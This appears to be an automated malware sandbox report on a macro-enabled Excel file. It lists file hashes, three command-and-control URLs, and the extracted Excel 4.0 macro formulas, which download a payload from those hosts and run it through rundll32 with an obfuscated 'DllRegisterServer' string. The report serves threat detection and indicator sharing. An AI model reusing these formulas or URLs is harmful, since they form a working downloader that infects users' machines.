General

  • Target

    ?i=1yjdvigns

  • Size

    83KB

  • MD5

    0c6adea1eff64b8f701e18a8c9e5284d

  • SHA1

    958197aca69eabbf0d6717e880ac3bb7d49a4d7a

  • SHA256

    ddfaf178cd5ea6decc275fa0a3d27bade27c40b7cd0ac8a086a615e296ce0377

  • SHA512

    7a01ec8855b51239dc59497bbc4e5b0da0f1d796963a6981842660fe734e05a48689ce3df35f9372068526b2217327eb5123d9a61631abec0b3a7db65c47fa02

  • SSDEEP

    1536:UqcBLusqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgZ:ncF+G/+CbE9H78wt2E1d7e6STa6SQ

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://robotically.xyz/wp-content/XtKkx/

http://2.arthaloca.com/styles/dS5RNprosfCabLtYEwO/

https://notesculture.com/wp-includes/LuQtO3MiyJFFcF/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://robotically.xyz/wp-content/XtKkx/","..\wxeu.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://2.arthaloca.com/styles/dS5RNprosfCabLtYEwO/","..\wxeu.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://notesculture.com/wp-includes/LuQtO3MiyJFFcF/","..\wxeu.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wxeu.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • ?i=1yjdvigns
    .xlsm office2007